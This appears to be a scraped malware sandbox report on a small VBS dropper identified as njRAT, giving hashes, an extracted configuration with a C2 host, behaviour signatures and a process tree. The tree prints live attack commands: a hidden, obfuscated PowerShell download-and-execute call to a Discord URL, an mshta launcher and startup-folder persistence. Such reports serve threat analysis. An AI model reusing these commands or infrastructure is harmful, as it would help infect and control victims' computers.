Overview

overview

10

Static

static

e147c36f7e...ed.vbs

windows7_x64

8

e147c36f7e...ed.vbs

windows10_x64

10

Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    windows10_x64
  • resource
    win10-en
  • submitted
    15-09-2021 08:29

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    e147c36f7e37e928c129b2337c90bda770f4cd437899932c723fd9d5392859ed.vbs

  • Size

    828B

  • MD5

    9af0d5fbc14e3ac0ae409dfef6e04228

  • SHA1

    931b3139830e5485f198bb72ecba50475e4c8df2

  • SHA256

    e147c36f7e37e928c129b2337c90bda770f4cd437899932c723fd9d5392859ed

  • SHA512

    fdca50df12edb4d7784a3c769908a695221456e8729b7ec61ec86b8328a18040c5aca7f2d6879f336b6c1a44b1323a8f1f05ff6dd14a4cbd9f233fedcd019f0e

Score
10/10
njratnyan cattrojan

Malware Config

Extracted

Family

njrat

Version

0.7NC

Botnet

NYAN CAT

C2

envirat.duckdns.org:3013

Mutex

6de17d5355fa43eca7e

Attributes
  • reg_key

    6de17d5355fa43eca7e

  • splitter

    @!#&^%$

Signatures

  • njRAT/Bladabindi

    Widely used RAT written in .NET.

    trojannjrat
  • Blocklisted process makes network request 1 IoCs
  • Drops startup file 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 35 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\e147c36f7e37e928c129b2337c90bda770f4cd437899932c723fd9d5392859ed.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4000
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -ExEcUtIoNPoLiCy ByPAsS -wInDoWStYlE hIdDEn -command Invoke-Expression(New-Object Net.WebClient).(-join [char[]](68,111,119,110,108,111,97,100,83,116,114,105,110,103)).Invoke('https://cdn.discordapp.com/attachments/876945743724822550/877222584595402823/Fucking.txt');$results
      2⤵
      • Blocklisted process makes network request
      • Drops startup file
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:524
      • C:\Windows\System32\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Login1.VBS"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1956
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\SystemLogin.bat" "
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4076
          • C:\Windows\system32\mshta.exe
            mshta vbscript:Execute("CreateObject(""WScript.Shell"").Run ""powershell -ExecutionPolicy Bypass & 'C:\Users\Public\myScript.ps1'"", 0:close")
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:2832
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass & 'C:\Users\Public\myScript.ps1'
              6⤵
              • Suspicious use of SetThreadContext
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:3924
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                7⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:2828

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1
T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Login1.VBS
    MD5

    558a8b7b3fdef4ca79110f8cfd126694

    SHA1

    d6e96ca27f701b3f4c24885dacd14c762a9d36b0

    SHA256

    38c9b7098371b39e61a6dcf78370dddf47f4d2be2c32704a2a0310b76c52c0f7

    SHA512

    37d6d72d5f518aaf1cf37154ed75aec7c7f11677508874eb3c3cbf44ca0ebeb22112dfa5f45a2f5d821604c521092ef768016d83f948444a9ff2e2a812d1c283

    Download Submit
  • C:\Users\Admin\AppData\Roaming\SystemLogin.bat
    MD5

    7f85382953fde20b101039d48673dbd2

    SHA1

    5ebaa67f5862b2925d9029f4761b7e2ce9a99dd9

    SHA256

    fde417ad1b13a97acfa8e409789a92c4c3ddf6303851337ca31b94bfac634e4f

    SHA512

    6e93b74237844e1f78cd3ae64c0a00702c0b1aa1febda2feb52ca99b8a58ab2efd0c7b8351f040bf56a8bc1a8f5b1f57c4a9ffed46f8a2f9cba898e8e138ce46

    Download Submit
  • C:\Users\Public\myScript.ps1
    MD5

    317f5c7ef5b887966f963c21a60e2889

    SHA1

    5078bdb3e7376202c7253a8b428a360e1c047863

    SHA256

    cd7143c00ef7711ccdcc6877d6d393e4f6e2bb2aef26bf2214b81e660f7c7cdd

    SHA512

    e4d6590082671997ef08550d48b5ff43dd63a1811c4b883bbe75a9a5e22087b5928be43e624632bdaf8c01d4334ae397c672d1695900d1bd25e7a27a03b10750

    Download Submit
  • memory/524-121-0x000001ED28FA0000-0x000001ED28FA1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/524-124-0x000001ED28600000-0x000001ED28602000-memory.dmp
    Filesize

    8KB

    Download
  • memory/524-126-0x000001ED28603000-0x000001ED28605000-memory.dmp
    Filesize

    8KB

    Download
  • memory/524-142-0x000001ED29250000-0x000001ED29251000-memory.dmp
    Filesize

    4KB

    Download
  • memory/524-153-0x000001ED29310000-0x000001ED29311000-memory.dmp
    Filesize

    4KB

    Download
  • memory/524-159-0x000001ED28606000-0x000001ED28608000-memory.dmp
    Filesize

    8KB

    Download
  • memory/524-160-0x000001ED29220000-0x000001ED29222000-memory.dmp
    Filesize

    8KB

    Download
  • memory/524-115-0x0000000000000000-mapping.dmp
    Download
  • memory/1956-177-0x0000000000000000-mapping.dmp
    Download
  • memory/2828-211-0x000000000040677E-mapping.dmp
    Download
  • memory/2828-210-0x0000000000400000-0x000000000040C000-memory.dmp
    Filesize

    48KB

    Download
  • memory/2828-221-0x00000000054C0000-0x00000000054C1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/2828-220-0x0000000005230000-0x0000000005231000-memory.dmp
    Filesize

    4KB

    Download
  • memory/2828-219-0x0000000005150000-0x000000000564E000-memory.dmp
    Filesize

    5.0MB

    Download
  • memory/2828-218-0x00000000052A0000-0x00000000052A1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/2828-217-0x0000000005650000-0x0000000005651000-memory.dmp
    Filesize

    4KB

    Download
  • memory/2828-216-0x00000000050B0000-0x00000000050B1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/2832-181-0x0000000000000000-mapping.dmp
    Download
  • memory/3924-202-0x000001F74B5B0000-0x000001F74B5B2000-memory.dmp
    Filesize

    8KB

    Download
  • memory/3924-209-0x000001F74B5D0000-0x000001F74B5D3000-memory.dmp
    Filesize

    12KB

    Download
  • memory/3924-208-0x000001F730CC6000-0x000001F730CC8000-memory.dmp
    Filesize

    8KB

    Download
  • memory/3924-207-0x000001F74B5C0000-0x000001F74B5C5000-memory.dmp
    Filesize

    20KB

    Download
  • memory/3924-184-0x0000000000000000-mapping.dmp
    Download
  • memory/3924-194-0x000001F730CC0000-0x000001F730CC2000-memory.dmp
    Filesize

    8KB

    Download
  • memory/3924-195-0x000001F730CC3000-0x000001F730CC5000-memory.dmp
    Filesize

    8KB

    Download
  • memory/4076-180-0x0000000000000000-mapping.dmp
    Download